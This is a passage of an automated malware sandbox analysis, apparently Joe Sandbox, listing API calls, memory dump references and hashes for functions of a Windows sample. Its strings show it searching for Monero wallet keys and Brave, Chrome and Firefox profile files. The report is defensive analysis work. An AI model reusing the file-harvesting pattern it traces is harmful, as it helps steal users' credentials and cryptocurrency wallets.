                            • Part of subcall function 00C07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BF11B7), ref: 00C07880
                            • Part of subcall function 00C07850: RtlAllocateHeap.NTDLL(00000000), ref: 00C07887
                            • Part of subcall function 00C07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C0789F
                          • ExitProcess.KERNEL32 ref: 00BF11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 9881e37541bcd2cb7198f90988d4143fe6963d19473674121f4caedb795eaf32
                          • Instruction ID: c45eacd7ea78f7ee8b6265237479c5a3f07f5085b2ac00c751754863168cd2a1
                          • Opcode Fuzzy Hash: 9881e37541bcd2cb7198f90988d4143fe6963d19473674121f4caedb795eaf32
                          • Instruction Fuzzy Hash: 3CE012B5E1430957CA0473B6AC0FB2A369C9B14349F084D39FB45F3582FA25F948E566

                          Non-executed Functions

                          Function 00C038B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00C038CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C038E3
                          • lstrcat.KERNEL32(?,?), ref: 00C03935
                          • StrCmpCA.SHLWAPI(?,00C10F70), ref: 00C03947
                          • StrCmpCA.SHLWAPI(?,00C10F74), ref: 00C0395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C03C67
                          • FindClose.KERNEL32(000000FF), ref: 00C03C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: ae5a3fbede72127983c21a7b0c02a97c0e53e8b9ef22ab10924b71175c875341
                          • Instruction ID: b19b09795eba67a312ac9a7a258aca4b6fd15f8feb6bc9ef8ca8426cf029c83d
                          • Opcode Fuzzy Hash: ae5a3fbede72127983c21a7b0c02a97c0e53e8b9ef22ab10924b71175c875341
                          • Instruction Fuzzy Hash: 5BA15171A002089FDB24DFA5DC89FFA777CBB54300F084598A659A6181DB719BC8CF62
                          Function 00BFBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00C10B32,00C10B2B,00000000,?,?,?,00C113F4,00C10B2A), ref: 00BFBEF5
                          • StrCmpCA.SHLWAPI(?,00C113F8), ref: 00BFBF4D
                          • StrCmpCA.SHLWAPI(?,00C113FC), ref: 00BFBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00BFC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 9b2750e86c375a924e28799bb691158e3e135914dc15ff473a7da4ed2e2afd71
                          • Instruction ID: f2ceaa2038fc589449e6db8843f2b89b2ec230c869fbd23b18803b94a1ac72fc
                          • Opcode Fuzzy Hash: 9b2750e86c375a924e28799bb691158e3e135914dc15ff473a7da4ed2e2afd71
                          • Instruction Fuzzy Hash: 9F4245729102089BCB14FB74DD96EED777DAB94300F4085A8B906A71C1EE349B4DDB92
                          Function 00C04910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00C0492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C04943
                          • StrCmpCA.SHLWAPI(?,00C10FDC), ref: 00C04971
                          • StrCmpCA.SHLWAPI(?,00C10FE0), ref: 00C04987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C04B7D
                          • FindClose.KERNEL32(000000FF), ref: 00C04B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: dcc89564fb7fcd15da38beb535ffe75117d5f6f7c5f96d879b5488fca979f68b
                          • Instruction ID: ff16948caae6fdc38360a61b5e5ef7b54323fd1d353b7e4a738a6d5da3623ed8
                          • Opcode Fuzzy Hash: dcc89564fb7fcd15da38beb535ffe75117d5f6f7c5f96d879b5488fca979f68b
                          • Instruction Fuzzy Hash: 306166B1500218AFCB24EBA5DC49EFA777CBB48700F048598B649A6180EB71DBC9CF91
                          Function 00C04570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C04580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C04587
                          • wsprintfA.USER32 ref: 00C045A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C045BD
                          • StrCmpCA.SHLWAPI(?,00C10FC4), ref: 00C045EB
                          • StrCmpCA.SHLWAPI(?,00C10FC8), ref: 00C04601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0468B
                          • FindClose.KERNEL32(000000FF), ref: 00C046A0
                          • lstrcat.KERNEL32(?,006EE4A0), ref: 00C046C5
                          • lstrcat.KERNEL32(?,006ED798), ref: 00C046D8
                          • lstrlen.KERNEL32(?), ref: 00C046E5
                          • lstrlen.KERNEL32(?), ref: 00C046F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 7a8cdc3115d9d4b68bbaba8d0c43dff3de9fd982080bdaadadd22fd1c9e99034
                          • Instruction ID: 984d5192fb1771bbbc4ba3f10896b09e23f4bc5b0412834630cd669a5d92f511
                          • Opcode Fuzzy Hash: 7a8cdc3115d9d4b68bbaba8d0c43dff3de9fd982080bdaadadd22fd1c9e99034
                          • Instruction Fuzzy Hash: F45143B150021C9FC724EBB4DC8DFEA777CAB58300F444598B649A2190EB759BC9CF91
                          Function 00C03EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00C03EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C03EDA
                          • StrCmpCA.SHLWAPI(?,00C10FAC), ref: 00C03F08
                          • StrCmpCA.SHLWAPI(?,00C10FB0), ref: 00C03F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0406C
                          • FindClose.KERNEL32(000000FF), ref: 00C04081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: e5bd58c45ba7353a45ca17bbfe769f9163305d0d0c9bc290fed449a671228b7b
                          • Instruction ID: 14693d51dad7b3e3b7721c148b58555fefed4fb2a459dc0860c924e315401078
                          • Opcode Fuzzy Hash: e5bd58c45ba7353a45ca17bbfe769f9163305d0d0c9bc290fed449a671228b7b
                          • Instruction Fuzzy Hash: DB5124B190021CAFCB24EBB5DC8AEFA777CBB54300F448598B659A6080DB75DB89CF51
                          Function 00BFED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00BFED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00BFED55
                          • StrCmpCA.SHLWAPI(?,00C11538), ref: 00BFEDAB
                          • StrCmpCA.SHLWAPI(?,00C1153C), ref: 00BFEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00BFF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 66f77b51cb6e1ceff2ea830cd0a99fbd78d19e2eb179c829877bf0547073185d
                          • Instruction ID: 1bb7f239b9156038161cd9a14b4da60fee9c8102ac5fb8ef458a2c5bf954cc6f
                          • Opcode Fuzzy Hash: 66f77b51cb6e1ceff2ea830cd0a99fbd78d19e2eb179c829877bf0547073185d
                          • Instruction Fuzzy Hash: AFE1C1719112189AEB54FB61DC96FEE7378AF54300F4085E9B50A620D2EF306F8ADF52
                          Function 00BFF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C115B8,00C10D96), ref: 00BFF71E
                          • StrCmpCA.SHLWAPI(?,00C115BC), ref: 00BFF76F
                          • StrCmpCA.SHLWAPI(?,00C115C0), ref: 00BFF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00BFFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 38fadb23b2598237ba1b24b91af8d7208bf88896ce656d8bba6a5e88e636c780
                          • Instruction ID: 5093565d9c6a405a8deab22d713c3dacf6fbfe1b14e7451524199e2f62d7d42a
                          • Opcode Fuzzy Hash: 38fadb23b2598237ba1b24b91af8d7208bf88896ce656d8bba6a5e88e636c780
                          • Instruction Fuzzy Hash: 8BB11F719102189BDB24FF64DC96FFE7379AF94300F4086A8A50A971D1EF306B49DB92
                          Function 00BF16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C1510C,?,?,?,00C151B4,?,?,00000000,?,00000000), ref: 00BF1923
                          • StrCmpCA.SHLWAPI(?,00C1525C), ref: 00BF1973
                          • StrCmpCA.SHLWAPI(?,00C15304), ref: 00BF1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BF1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00BF1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF1E20
                          • FindClose.KERNEL32(000000FF), ref: 00BF1E32
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 5241b3a749d1a10841af9f9b57573b16bc7c50addfa302a481ffff022270ec4b
                          • Instruction ID: c59d74a2304bf287056c68fdd87c5c7516e7723714cdcc873db5cd22611686c2
                          • Opcode Fuzzy Hash: 5241b3a749d1a10841af9f9b57573b16bc7c50addfa302a481ffff022270ec4b
                          • Instruction Fuzzy Hash: 3212F0719102189BDB55FB60CC96EEE7378AF54300F4086E9B50A660D1EF706F89DFA1
                          Function 00BFDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
